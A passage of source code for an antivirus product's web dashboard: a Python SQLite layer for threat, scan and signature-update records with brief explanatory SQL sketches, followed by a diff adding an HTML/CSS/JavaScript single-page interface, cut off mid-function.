last_7d = self.conn.execute(
"SELECT COUNT(*) FROM threat_log WHERE timestamp >= ?",
(cutoff_7d,),
).fetchone()[0]
return {
"total": total,
"by_severity": by_severity,
"last_24h": last_24h,
"last_7d": last_7d,
}
# ------------------------------------------------------------------
# Scans
# ------------------------------------------------------------------
def record_scan(
self,
scan_type: str,
scan_path: str,
files_scanned: int,
files_skipped: int,
threats_found: int,
duration: float,
status: str = "completed",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO scan_history "
"(scan_type, scan_path, files_scanned, files_skipped, "
"threats_found, duration_seconds, status) "
"VALUES (?,?,?,?,?,?,?)",
(scan_type, scan_path, files_scanned, files_skipped,
threats_found, duration, status),
)
self.conn.commit()
def get_recent_scans(self, limit: int = 30) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM scan_history ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
def get_scan_chart_data(
self, days: int = DASHBOARD_SCAN_HISTORY_DAYS,
) -> List[Dict[str, Any]]:
cutoff = (datetime.utcnow() - timedelta(days=days)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
rows = self.conn.execute(
"SELECT DATE(timestamp) as day, "
"COUNT(*) as scans, "
"SUM(threats_found) as threats, "
"SUM(files_scanned) as files "
"FROM scan_history WHERE timestamp >= ? "
"GROUP BY DATE(timestamp) ORDER BY day",
(cutoff,),
).fetchall()
return [dict(r) for r in rows]
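The roll-up in `get_scan_chart_data` leans on SQLite's `DATE()` truncation of the stored `%Y-%m-%d %H:%M:%S` strings; a self-contained sketch against an in-memory table with the same columns:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE scan_history ("
    "timestamp TEXT, files_scanned INTEGER, threats_found INTEGER)"
)
rows = [
    ("2024-05-01 09:00:00", 120, 1),
    ("2024-05-01 21:30:00", 300, 0),
    ("2024-05-02 08:15:00", 80, 2),
]
conn.executemany("INSERT INTO scan_history VALUES (?,?,?)", rows)

# DATE() keeps only the calendar day, so GROUP BY buckets per day.
chart = conn.execute(
    "SELECT DATE(timestamp) AS day, COUNT(*) AS scans, "
    "SUM(threats_found) AS threats, SUM(files_scanned) AS files "
    "FROM scan_history GROUP BY DATE(timestamp) ORDER BY day"
).fetchall()
print(chart)  # [('2024-05-01', 2, 1, 420), ('2024-05-02', 1, 2, 80)]
```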
# ------------------------------------------------------------------
# Signature Updates
# ------------------------------------------------------------------
def record_sig_update(
self,
feed_name: str,
hashes: int = 0,
ips: int = 0,
domains: int = 0,
urls: int = 0,
status: str = "success",
details: str = "",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO signature_updates "
"(feed_name, hashes_added, ips_added, domains_added, "
"urls_added, status, details) "
"VALUES (?,?,?,?,?,?,?)",
(feed_name, hashes, ips, domains, urls, status, details),
)
self.conn.commit()
def get_recent_sig_updates(self, limit: int = 20) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM signature_updates ORDER BY id DESC LIMIT ?",
(limit,),
).fetchall()
return [dict(r) for r in rows]
def get_sig_stats(self) -> Dict[str, Any]:
"""Return signature stats from the actual signatures database."""
result = {
"total_hashes": 0,
"total_ips": 0,
"total_domains": 0,
"total_urls": 0,
"last_update": None,
}
# Try to read live counts from the signatures DB
sig_db_path = self.db_path.replace("dashboard.db", "signatures.db")
try:
import sqlite3 as _sql
sdb = _sql.connect(sig_db_path)
sdb.row_factory = _sql.Row
for tbl, key in [("threats", "total_hashes"), ("ioc_ips", "total_ips"),
("ioc_domains", "total_domains"), ("ioc_urls", "total_urls")]:
try:
result[key] = sdb.execute(f"SELECT COUNT(*) FROM {tbl}").fetchone()[0]
except Exception:
pass
try:
ts = sdb.execute("SELECT MAX(added_date) FROM threats").fetchone()[0]
result["last_update"] = ts
except Exception:
pass
sdb.close()
except Exception:
# Fallback to dashboard update log
with self._lock:
row = self.conn.execute(
"SELECT SUM(hashes_added), SUM(ips_added), "
"SUM(domains_added), SUM(urls_added) FROM signature_updates"
).fetchone()
result["total_hashes"] = row[0] or 0
result["total_ips"] = row[1] or 0
result["total_domains"] = row[2] or 0
result["total_urls"] = row[3] or 0
lu = self.conn.execute(
"SELECT MAX(timestamp) FROM signature_updates"
).fetchone()[0]
result["last_update"] = lu
return result
# ------------------------------------------------------------------
# Activity Log
# ------------------------------------------------------------------
def log_activity(
self,
message: str,
level: str = "INFO",
source: str = "system",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO activity_log (level, source, message) VALUES (?,?,?)",
(level, source, message),
)
self.conn.commit()
def get_recent_logs(self, limit: int = 20) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM activity_log ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
# ------------------------------------------------------------------
# Cleanup
# ------------------------------------------------------------------
def cleanup_old_metrics(
self, hours: int = DASHBOARD_METRIC_RETENTION_HOURS,
) -> None:
cutoff = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
self.conn.execute("DELETE FROM metrics WHERE timestamp < ?", (cutoff,))
self.conn.commit()
def close(self) -> None:
self.conn.close()
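`cleanup_old_metrics` compares ISO-style timestamp strings lexicographically; that is sound because the `%Y-%m-%d %H:%M:%S` layout sorts chronologically as text. A minimal sketch of the retention pass:

```python
import sqlite3
from datetime import datetime, timedelta

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE metrics (timestamp TEXT, cpu_percent REAL)")

now = datetime(2024, 5, 2, 12, 0, 0)
fmt = "%Y-%m-%d %H:%M:%S"
conn.executemany(
    "INSERT INTO metrics VALUES (?, ?)",
    [
        ((now - timedelta(hours=30)).strftime(fmt), 5.0),   # beyond retention
        ((now - timedelta(hours=2)).strftime(fmt), 40.0),   # recent
        (now.strftime(fmt), 55.0),                          # current
    ],
)

# Delete everything older than the retention window (string comparison).
retention_hours = 24
cutoff = (now - timedelta(hours=retention_hours)).strftime(fmt)
conn.execute("DELETE FROM metrics WHERE timestamp < ?", (cutoff,))
remaining = conn.execute("SELECT COUNT(*) FROM metrics").fetchone()[0]
print(remaining)  # 2
```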


@@ -0,0 +1,910 @@
"""AYN Antivirus Dashboard — HTML Template.
Single-page application with embedded CSS and JavaScript.
All data is fetched from the ``/api/*`` endpoints.
"""
from __future__ import annotations
def get_dashboard_html() -> str:
"""Return the complete HTML dashboard as a string."""
return _HTML
_HTML = r"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>AYN Antivirus — Security Dashboard</title>
<style>
:root{--bg:#0a0e17;--surface:#111827;--surface2:#1a2332;--surface3:#1f2b3d;
--border:#2a3444;--text:#e2e8f0;--text-dim:#8892a4;--accent:#3b82f6;
--green:#10b981;--red:#ef4444;--orange:#f59e0b;--yellow:#eab308;
--purple:#8b5cf6;--cyan:#06b6d4;--radius:8px;--shadow:0 2px 8px rgba(0,0,0,.3)}
*{margin:0;padding:0;box-sizing:border-box}
body{background:var(--bg);color:var(--text);font-family:'Segoe UI',system-ui,-apple-system,sans-serif;font-size:14px;min-height:100vh}
a{color:var(--accent);text-decoration:none}
::-webkit-scrollbar{width:6px;height:6px}
::-webkit-scrollbar-track{background:var(--surface)}
::-webkit-scrollbar-thumb{background:var(--border);border-radius:3px}
/* ── Header ── */
.header{background:var(--surface);border-bottom:1px solid var(--border);padding:12px 24px;display:flex;align-items:center;justify-content:space-between;position:sticky;top:0;z-index:100}
.header-left{display:flex;align-items:center;gap:16px}
.logo{font-size:1.3rem;font-weight:800;letter-spacing:.05em}
.logo span{color:var(--accent)}
.header-meta{display:flex;gap:20px;font-size:.82rem;color:var(--text-dim)}
.header-meta b{color:var(--text);font-weight:600}
.pulse{display:inline-block;width:8px;height:8px;background:var(--green);border-radius:50%;margin-right:6px;animation:pulse 2s infinite}
@keyframes pulse{0%,100%{opacity:1}50%{opacity:.4}}
/* ── Navigation ── */
.nav{background:var(--surface);border-bottom:1px solid var(--border);padding:0 24px;display:flex;gap:0;overflow-x:auto}
.nav-tab{padding:12px 20px;cursor:pointer;color:var(--text-dim);font-weight:600;font-size:.85rem;border-bottom:2px solid transparent;transition:all .2s;white-space:nowrap;user-select:none}
.nav-tab:hover{color:var(--text);background:var(--surface2)}
.nav-tab.active{color:var(--accent);border-bottom-color:var(--accent)}
/* ── Layout ── */
.content{padding:20px 24px;max-width:1440px;margin:0 auto}
.tab-panel{display:none;animation:fadeIn .25s}
.tab-panel.active{display:block}
@keyframes fadeIn{from{opacity:0;transform:translateY(4px)}to{opacity:1;transform:none}}
.grid{display:grid;gap:16px}
.g2{grid-template-columns:repeat(2,1fr)}
.g3{grid-template-columns:repeat(3,1fr)}
.g4{grid-template-columns:repeat(4,1fr)}
.g6{grid-template-columns:repeat(6,1fr)}
@media(max-width:900px){.g2,.g3,.g4,.g6{grid-template-columns:1fr}}
@media(min-width:901px) and (max-width:1200px){.g4{grid-template-columns:repeat(2,1fr)}.g6{grid-template-columns:repeat(3,1fr)}}
.section{margin-bottom:24px}
.section-title{font-size:1rem;font-weight:700;margin-bottom:12px;display:flex;align-items:center;gap:8px}
.section-title .icon{font-size:1.1rem}
/* ── Cards ── */
.card{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:16px;transition:border-color .2s,box-shadow .2s}
.card:hover{border-color:var(--accent);box-shadow:0 0 12px rgba(59,130,246,.1)}
.card-label{font-size:.75rem;color:var(--text-dim);text-transform:uppercase;letter-spacing:.06em;margin-bottom:6px}
.card-value{font-size:1.6rem;font-weight:700}
.card-sub{font-size:.78rem;color:var(--text-dim);margin-top:4px}
.card-green .card-value{color:var(--green)}
.card-red .card-value{color:var(--red)}
.card-orange .card-value{color:var(--orange)}
.card-yellow .card-value{color:var(--yellow)}
.card-accent .card-value{color:var(--accent)}
.card-purple .card-value{color:var(--purple)}
/* ── Gauge (SVG circular) ── */
.gauge-wrap{display:flex;flex-direction:column;align-items:center;padding:12px}
.gauge{position:relative;width:110px;height:110px}
.gauge svg{transform:rotate(-90deg)}
.gauge-bg{fill:none;stroke:var(--border);stroke-width:10}
.gauge-fill{fill:none;stroke-width:10;stroke-linecap:round;transition:stroke-dashoffset .8s ease}
.gauge-text{position:absolute;inset:0;display:flex;align-items:center;justify-content:center;font-size:1.3rem;font-weight:700}
.gauge-label{margin-top:8px;font-size:.8rem;color:var(--text-dim);font-weight:600}
/* ── Badges ── */
.badge{display:inline-block;padding:2px 8px;border-radius:4px;font-size:.72rem;font-weight:700;text-transform:uppercase;letter-spacing:.03em}
.badge-critical{background:rgba(239,68,68,.15);color:var(--red);border:1px solid var(--red)}
.badge-high{background:rgba(245,158,11,.15);color:var(--orange);border:1px solid var(--orange)}
.badge-medium{background:rgba(234,179,8,.15);color:var(--yellow);border:1px solid var(--yellow)}
.badge-low{background:rgba(16,185,129,.15);color:var(--green);border:1px solid var(--green)}
.badge-success{background:rgba(16,185,129,.15);color:var(--green);border:1px solid var(--green)}
.badge-error{background:rgba(239,68,68,.15);color:var(--red);border:1px solid var(--red)}
.badge-running{background:rgba(59,130,246,.15);color:var(--accent);border:1px solid var(--accent)}
.badge-info{background:rgba(59,130,246,.15);color:var(--accent);border:1px solid var(--accent)}
.badge-warning{background:rgba(245,158,11,.15);color:var(--orange);border:1px solid var(--orange)}
/* ── Tables ── */
.tbl-wrap{overflow-x:auto;border:1px solid var(--border);border-radius:var(--radius);background:var(--surface)}
table{width:100%;border-collapse:collapse}
th{background:var(--surface2);color:var(--text-dim);font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;padding:10px 12px;text-align:left;position:sticky;top:0}
td{padding:9px 12px;border-top:1px solid var(--border);font-size:.84rem;vertical-align:middle}
tr:hover td{background:rgba(59,130,246,.04)}
.mono{font-family:'Cascadia Code','Fira Code',monospace;font-size:.78rem}
.trunc{max-width:260px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.empty-row td{text-align:center;padding:32px;color:var(--text-dim);font-size:.95rem}
/* ── Bar Chart (CSS) ── */
.bar-chart{display:flex;align-items:flex-end;gap:4px;height:120px;padding:8px 0}
.bar-col{display:flex;flex-direction:column;align-items:center;flex:1;min-width:0}
.bar{width:100%;min-height:2px;border-radius:3px 3px 0 0;transition:height .4s;position:relative;cursor:default}
.bar:hover::after{content:attr(data-tip);position:absolute;bottom:calc(100% + 4px);left:50%;transform:translateX(-50%);background:var(--surface3);border:1px solid var(--border);padding:3px 8px;border-radius:4px;font-size:.7rem;white-space:nowrap;z-index:5}
.bar-label{font-size:.6rem;color:var(--text-dim);margin-top:4px;writing-mode:vertical-lr;transform:rotate(180deg);max-height:40px;overflow:hidden}
.bar-threats{background:var(--red)}
.bar-scans{background:var(--accent)}
/* ── Disk bars ── */
.disk-row{display:flex;align-items:center;gap:12px;padding:6px 0}
.disk-mount{width:100px;font-size:.8rem;color:var(--text-dim);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
.disk-bar-outer{flex:1;height:14px;background:var(--surface2);border-radius:7px;overflow:hidden}
.disk-bar-inner{height:100%;border-radius:7px;transition:width .6s}
.disk-pct{width:50px;text-align:right;font-size:.8rem;font-weight:600}
/* ── Buttons ── */
.btn{display:inline-flex;align-items:center;gap:6px;padding:8px 16px;border-radius:6px;border:1px solid var(--border);background:var(--surface2);color:var(--text);font-size:.82rem;font-weight:600;cursor:pointer;transition:all .2s;white-space:nowrap}
.btn:hover{border-color:var(--accent);background:var(--surface3)}
.btn-primary{background:var(--accent);border-color:var(--accent);color:#fff}
.btn-primary:hover{background:#2563eb}
.btn-sm{padding:5px 10px;font-size:.76rem}
.btn:disabled{opacity:.5;cursor:not-allowed}
.spinner{display:inline-block;width:14px;height:14px;border:2px solid rgba(255,255,255,.3);border-top-color:#fff;border-radius:50%;animation:spin .6s linear infinite}
@keyframes spin{to{transform:rotate(360deg)}}
.btn-row{display:flex;gap:8px;flex-wrap:wrap;margin-bottom:12px}
/* ── Filter bar ── */
.filters{display:flex;gap:8px;flex-wrap:wrap;margin-bottom:14px;align-items:center}
.filters select,.filters input{background:var(--surface2);border:1px solid var(--border);color:var(--text);padding:7px 10px;border-radius:6px;font-size:.82rem}
.filters select:focus,.filters input:focus{outline:none;border-color:var(--accent)}
.filters input{min-width:200px}
/* ── Sub-tabs ── */
.sub-tabs{display:flex;gap:0;margin-bottom:14px;border-bottom:1px solid var(--border)}
.sub-tab{padding:8px 16px;cursor:pointer;color:var(--text-dim);font-size:.82rem;font-weight:600;border-bottom:2px solid transparent;transition:all .2s}
.sub-tab:hover{color:var(--text)}
.sub-tab.active{color:var(--accent);border-bottom-color:var(--accent)}
/* ── Pagination ── */
.pager{display:flex;align-items:center;justify-content:center;gap:12px;padding:12px;font-size:.84rem;color:var(--text-dim)}
/* ── Logs ── */
.log-view{background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);padding:8px;max-height:500px;overflow-y:auto;font-family:'Cascadia Code','Fira Code',monospace;font-size:.78rem;line-height:1.7}
.log-line{padding:2px 4px;display:flex;gap:10px;border-bottom:1px solid rgba(42,52,68,.4)}
.log-ts{color:var(--text-dim);min-width:140px}
.log-src{color:var(--purple);min-width:80px}
.log-msg{flex:1;word-break:break-all}
/* ── Toast ── */
.toast-area{position:fixed;top:70px;right:20px;z-index:200;display:flex;flex-direction:column;gap:8px}
.toast{padding:10px 18px;border-radius:6px;font-size:.84rem;font-weight:600;animation:slideIn .3s;box-shadow:var(--shadow)}
.toast-success{background:#065f46;color:#a7f3d0;border:1px solid var(--green)}
.toast-error{background:#7f1d1d;color:#fca5a5;border:1px solid var(--red)}
.toast-info{background:#1e3a5f;color:#93c5fd;border:1px solid var(--accent)}
@keyframes slideIn{from{opacity:0;transform:translateX(30px)}to{opacity:1;transform:none}}
</style>
</head>
<body>
<!-- HEADER -->
<div class="header">
<div class="header-left">
<div class="logo">⚔️ <span>AYN</span> ANTIVIRUS</div>
<div style="font-size:.75rem;color:var(--text-dim)">Security Dashboard</div>
</div>
<div class="header-meta">
<div><span class="pulse"></span><b id="hd-host">—</b></div>
<div>Up <b id="hd-uptime">—</b></div>
<div id="hd-time">—</div>
</div>
</div>
<!-- NAV -->
<div class="nav" id="nav">
<div class="nav-tab active" data-tab="overview">📊 Overview</div>
<div class="nav-tab" data-tab="threats">🛡️ Threats</div>
<div class="nav-tab" data-tab="scans">🔍 Scans</div>
<div class="nav-tab" data-tab="definitions">📚 Definitions</div>
<div class="nav-tab" data-tab="containers">🐳 Containers</div>
<div class="nav-tab" data-tab="quarantine">🔒 Quarantine</div>
<div class="nav-tab" data-tab="logs">📋 Logs</div>
</div>
<!-- CONTENT -->
<div class="content">
<!-- ═══════ TAB: OVERVIEW ═══════ -->
<div class="tab-panel active" id="panel-overview">
<!-- Status cards -->
<div class="section">
<div class="grid g4" id="status-cards">
<div class="card card-green"><div class="card-label">Protection</div><div class="card-value" id="ov-prot">Active</div><div class="card-sub" id="ov-prot-sub">AI-powered analysis</div></div>
<div class="card card-accent"><div class="card-label">Last Scan</div><div class="card-value" id="ov-scan">—</div><div class="card-sub" id="ov-scan-sub">—</div></div>
<div class="card card-purple"><div class="card-label">Signatures</div><div class="card-value" id="ov-sigs">—</div><div class="card-sub" id="ov-sigs-sub">—</div></div>
<div class="card"><div class="card-label">Quarantine</div><div class="card-value" id="ov-quar">0</div><div class="card-sub">Isolated items</div></div>
</div>
</div>
<!-- CPU Per-Core -->
<div class="section">
<div class="section-title"><span class="icon">🧮</span> CPU Per Core <span id="cpu-summary" style="font-size:.8rem;color:var(--text-dim);margin-left:8px"></span></div>
<div class="card" style="padding:12px">
<canvas id="cpu-canvas" height="140" style="width:100%;display:block"></canvas>
</div>
</div>
<!-- Memory Breakdown -->
<div class="section">
<div class="section-title"><span class="icon">🧠</span> Memory Usage <span id="mem-summary" style="font-size:.8rem;color:var(--text-dim);margin-left:8px"></span></div>
<div class="grid g2">
<div class="card" style="padding:12px">
<canvas id="mem-canvas" height="160" style="width:100%;display:block"></canvas>
</div>
<div class="card" style="padding:12px">
<div class="card-label">Memory Breakdown</div>
<div id="mem-bars" style="margin-top:8px"></div>
<div style="margin-top:12px;border-top:1px solid var(--border);padding-top:8px">
<div class="card-label">Swap</div>
<div id="swap-bar"></div>
</div>
</div>
</div>
</div>
<!-- Load + Network + Processes -->
<div class="section">
<div class="grid g3">
<div class="card"><div class="card-label">Load Average</div><div class="card-value" id="ov-load" style="font-size:1.2rem">—</div><div class="card-sub">1 / 5 / 15 min</div></div>
<div class="card"><div class="card-label">Network Connections</div><div class="card-value" id="ov-netconn">—</div><div class="card-sub">Active inet sockets</div></div>
<div class="card"><div class="card-label">CPU Frequency</div><div class="card-value" id="ov-freq" style="font-size:1.2rem">—</div><div class="card-sub">Current MHz</div></div>
</div>
</div>
<!-- Top Processes -->
<div class="section">
<div class="section-title"><span class="icon">⚙️</span> Top Processes</div>
<div class="tbl-wrap">
<table><thead><tr><th>PID</th><th>Process</th><th>CPU %</th><th>RAM %</th></tr></thead><tbody id="proc-tbody"><tr class="empty-row"><td colspan="4">Loading…</td></tr></tbody></table>
</div>
</div>
<!-- Disk -->
<div class="section">
<div class="section-title"><span class="icon">💾</span> Disk Usage</div>
<div class="card" id="disk-area"><div style="color:var(--text-dim);padding:8px">Loading…</div></div>
</div>
<!-- Threat summary -->
<div class="section">
<div class="section-title"><span class="icon">⚠️</span> Threat Summary</div>
<div class="grid g4">
<div class="card card-red"><div class="card-label">Critical</div><div class="card-value" id="ov-tc">0</div></div>
<div class="card card-orange"><div class="card-label">High</div><div class="card-value" id="ov-th">0</div></div>
<div class="card card-yellow"><div class="card-label">Medium</div><div class="card-value" id="ov-tm">0</div></div>
<div class="card card-green"><div class="card-label">Low</div><div class="card-value" id="ov-tl">0</div></div>
</div>
</div>
<!-- Scan Activity Chart -->
<div class="section">
<div class="section-title"><span class="icon">📈</span> Scan Activity (14 days)</div>
<div class="card" style="padding:12px">
<canvas id="scan-canvas" height="160" style="width:100%;display:block"></canvas>
<div style="display:flex;gap:16px;justify-content:center;margin-top:8px;font-size:.75rem;color:var(--text-dim)">
<span>🔵 Scans</span><span>🔴 Threats Found</span>
</div>
</div>
</div>
</div>
<!-- ═══════ TAB: THREATS ═══════ -->
<div class="tab-panel" id="panel-threats">
<div class="filters">
<select id="f-severity"><option value="">All Severities</option><option value="CRITICAL">Critical</option><option value="HIGH">High</option><option value="MEDIUM">Medium</option><option value="LOW">Low</option></select>
<select id="f-type"><option value="">All Types</option><option value="MALWARE">Malware</option><option value="MINER">Miner</option><option value="SPYWARE">Spyware</option><option value="VIRUS">Virus</option><option value="ROOTKIT">Rootkit</option></select>
<input type="text" id="f-search" placeholder="Search threats…">
</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>File Path</th><th>Threat</th><th>Type</th><th>Severity</th><th>Detector</th><th>AI Verdict</th><th>Status</th><th>Actions</th></tr></thead><tbody id="threat-tbody"><tr class="empty-row"><td colspan="9">Loading…</td></tr></tbody></table>
</div>
<div class="pager"><button class="btn btn-sm" id="threat-prev">← Prev</button><span id="threat-page">Page 1</span><button class="btn btn-sm" id="threat-next">Next →</button></div>
</div>
<!-- ═══════ TAB: SCANS ═══════ -->
<div class="tab-panel" id="panel-scans">
<div class="btn-row">
<button class="btn btn-primary" id="btn-quick-scan" onclick="doAction('quick-scan',this)">⚡ Run Quick Scan</button>
<button class="btn" id="btn-full-scan" onclick="doAction('full-scan',this)">🔍 Run Full Scan</button>
</div>
<div class="section">
<div class="section-title"><span class="icon">📈</span> Scan History (30 days)</div>
<div class="card" style="padding:12px"><canvas id="scan-chart-canvas" height="160" style="width:100%;display:block"></canvas><div style="display:flex;gap:16px;justify-content:center;margin-top:8px;font-size:.75rem;color:var(--text-dim)"><span>🔵 Scans</span><span>🔴 Threats</span></div></div>
</div>
<div class="section">
<div class="section-title"><span class="icon">📋</span> Recent Scans</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>Type</th><th>Path</th><th>Files</th><th>Threats</th><th>Duration</th><th>Status</th></tr></thead><tbody id="scan-tbody"><tr class="empty-row"><td colspan="7">Loading…</td></tr></tbody></table>
</div>
</div>
</div>
<!-- ═══════ TAB: DEFINITIONS ═══════ -->
<div class="tab-panel" id="panel-definitions">
<div class="grid g4 section">
<div class="card card-purple"><div class="card-label">Hashes</div><div class="card-value" id="def-hashes">0</div></div>
<div class="card card-accent"><div class="card-label">Malicious IPs</div><div class="card-value" id="def-ips">0</div></div>
<div class="card card-orange"><div class="card-label">Domains</div><div class="card-value" id="def-domains">0</div></div>
<div class="card card-red"><div class="card-label">URLs</div><div class="card-value" id="def-urls">0</div></div>
</div>
<div class="btn-row">
<button class="btn btn-primary" onclick="doAction('update-sigs',this)">🔄 Update All Feeds</button>
<button class="btn btn-sm" onclick="doFeedUpdate('malwarebazaar',this)">MalwareBazaar</button>
<button class="btn btn-sm" onclick="doFeedUpdate('threatfox',this)">ThreatFox</button>
<button class="btn btn-sm" onclick="doFeedUpdate('urlhaus',this)">URLhaus</button>
<button class="btn btn-sm" onclick="doFeedUpdate('feodotracker',this)">FeodoTracker</button>
<button class="btn btn-sm" onclick="doFeedUpdate('emergingthreats',this)">EmergingThreats</button>
</div>
<div class="sub-tabs" id="def-subtabs">
<div class="sub-tab active" data-def="all">All</div>
<div class="sub-tab" data-def="hash">Hashes</div>
<div class="sub-tab" data-def="ip">IPs</div>
<div class="sub-tab" data-def="domain">Domains</div>
<div class="sub-tab" data-def="url">URLs</div>
</div>
<div class="filters"><input type="text" id="def-search" placeholder="Search definitions…" style="flex:1;max-width:400px"></div>
<div class="tbl-wrap"><table><thead id="def-thead"></thead><tbody id="def-tbody"><tr class="empty-row"><td colspan="6">Loading…</td></tr></tbody></table></div>
<div class="pager"><button class="btn btn-sm" id="def-prev" onclick="defPage(-1)">← Prev</button><span id="def-page-info">Page 1</span><button class="btn btn-sm" id="def-next" onclick="defPage(1)">Next →</button></div>
<div class="section" style="margin-top:20px">
<div class="section-title"><span class="icon">🔄</span> Recent Updates</div>
<div class="tbl-wrap"><table><thead><tr><th>Time</th><th>Feed</th><th>Hashes</th><th>IPs</th><th>Domains</th><th>URLs</th><th>Status</th></tr></thead><tbody id="sigup-tbody"></tbody></table></div>
</div>
</div>
<!-- ═══════ TAB: CONTAINERS ═══════ -->
<div class="tab-panel" id="panel-containers">
<div class="btn-row">
<button class="btn btn-primary" id="btn-scan-containers" onclick="doAction('scan-containers',this)">🐳 Scan All Containers</button>
</div>
<div class="grid g3 section">
<div class="card card-accent"><div class="card-label">Containers Found</div><div class="card-value" id="ct-count">0</div></div>
<div class="card card-green"><div class="card-label">Available Runtimes</div><div class="card-value" id="ct-runtimes" style="font-size:1rem">—</div></div>
<div class="card card-red"><div class="card-label">Container Threats</div><div class="card-value" id="ct-threats">0</div></div>
</div>
<div class="section">
<div class="section-title"><span class="icon">📦</span> Discovered Containers</div>
<div class="tbl-wrap">
<table><thead><tr><th>ID</th><th>Name</th><th>Image</th><th>Runtime</th><th>Status</th><th>IP</th><th>Ports</th><th>Action</th></tr></thead>
<tbody id="ct-tbody"><tr class="empty-row"><td colspan="8">Loading…</td></tr></tbody></table>
</div>
</div>
<div class="section">
<div class="section-title"><span class="icon">⚠️</span> Container Threats</div>
<div class="tbl-wrap">
<table><thead><tr><th>Time</th><th>Container</th><th>Threat</th><th>Type</th><th>Severity</th><th>Details</th></tr></thead>
<tbody id="ct-threat-tbody"><tr class="empty-row"><td colspan="6">No container threats ✅</td></tr></tbody></table>
</div>
</div>
</div>
<!-- ═══════ TAB: QUARANTINE ═══════ -->
<div class="tab-panel" id="panel-quarantine">
<div class="grid g2 section">
<div class="card"><div class="card-label">Total Quarantined</div><div class="card-value" id="q-count">0</div></div>
<div class="card"><div class="card-label">Vault Size</div><div class="card-value" id="q-size">0 B</div></div>
</div>
<div class="tbl-wrap"><table><thead><tr><th>ID</th><th>Original Path</th><th>Threat</th><th>Date</th><th>Size</th></tr></thead><tbody id="quar-tbody"><tr class="empty-row"><td colspan="5">Vault is empty ✅</td></tr></tbody></table></div>
</div>
<!-- ═══════ TAB: LOGS ═══════ -->
<div class="tab-panel" id="panel-logs">
<div class="btn-row"><button class="btn btn-sm" onclick="loadLogs()">🔄 Refresh</button></div>
<div class="log-view" id="log-view"><div style="color:var(--text-dim)">Loading…</div></div>
</div>
</div><!-- /content -->
<!-- Toast area -->
<div class="toast-area" id="toast-area"></div>
<script>
/* ── State ── */
let S={threats:[],threatPage:1,threatPerPage:25,defType:'all',defPage:1,defPerPage:50,defSearch:''};
const $=id=>document.getElementById(id);
const Q=(s,el)=>(el||document).querySelectorAll(s);
/* ── Helpers ── */
function fmt(n){return n==null?'':Number(n).toLocaleString()}
function fmtBytes(b){if(!b)return '0 B';const u=['B','KB','MB','GB','TB'];let i=0;let v=b;while(v>=1024&&i<u.length-1){v/=1024;i++;}return v.toFixed(i?1:0)+' '+u[i];}
function fmtDur(s){if(!s||s<0)return '0s';s=Math.round(s);if(s<60)return s+'s';if(s<3600)return Math.floor(s/60)+'m '+s%60+'s';return Math.floor(s/3600)+'h '+Math.floor(s%3600/60)+'m';}
function ago(ts){if(!ts)return '';const d=new Date(ts+'Z');const s=Math.floor((Date.now()-d)/1000);if(s<60)return s+'s ago';if(s<3600)return Math.floor(s/60)+'m ago';if(s<86400)return Math.floor(s/3600)+'h ago';return Math.floor(s/86400)+'d ago';}
function sevBadge(s){const c=esc((s||'').toUpperCase());const cl=c.toLowerCase().replace(/[^a-z]/g,'');return `<span class="badge badge-${cl}">${c}</span>`;}
function statusBadge(s){const m={completed:'success',success:'success',running:'running',failed:'error',error:'error'};const safe=esc(s||'');const cl=(m[s]||'info').replace(/[^a-z]/g,'');return `<span class="badge badge-${cl}">${safe}</span>`;}
function esc(s){const d=document.createElement('div');d.textContent=s||'';return d.innerHTML;}
function trunc(s,n){s=s||'';return s.length>n?s.slice(0,n)+'…':s;}
function setGauge(id,pct,color){const g=$(id);if(!g)return;const c=g.querySelector('.gauge-fill');const t=g.querySelector('.gauge-text');const off=314-(314*Math.min(pct,100)/100);c.style.strokeDashoffset=off;if(color)c.style.stroke=color;t.textContent=Math.round(pct)+'%';}
function gaugeColor(p){return p>90?'var(--red)':p>70?'var(--orange)':p>50?'var(--yellow)':'var(--green)';}
/* ── Toast ── */
function toast(msg,type='info'){const t=document.createElement('div');t.className='toast toast-'+type;t.textContent=msg;$('toast-area').appendChild(t);setTimeout(()=>t.remove(),4000);}
/* ── API ── */
async function api(path){try{const r=await fetch(path);if(!r.ok)throw new Error(r.statusText);return await r.json();}catch(e){console.error('API error:',path,e);return null;}}
/* ── Tab switching ── */
Q('.nav-tab').forEach(t=>t.addEventListener('click',()=>{
Q('.nav-tab').forEach(x=>x.classList.remove('active'));
Q('.tab-panel').forEach(x=>x.classList.remove('active'));
t.classList.add('active');
$('panel-'+t.dataset.tab).classList.add('active');
if(t.dataset.tab==='threats')loadThreats();
if(t.dataset.tab==='scans')loadScans();
if(t.dataset.tab==='definitions')loadDefs();
if(t.dataset.tab==='containers')loadContainers();
if(t.dataset.tab==='quarantine')loadQuarantine();
if(t.dataset.tab==='logs')loadLogs();
}));
/* ═══════ OVERVIEW ═══════ */
/* ── Canvas Chart Helpers ── */
let _cpuHistory=[];const _CPU_HIST_MAX=60;
let _memHistory=[];const _MEM_HIST_MAX=60;
function drawLineChart(canvasId,datasets,opts={}){
const cv=$(canvasId);if(!cv)return;
const dpr=window.devicePixelRatio||1;
const rect=cv.getBoundingClientRect();
cv.width=rect.width*dpr;cv.height=(opts.height||rect.height)*dpr;
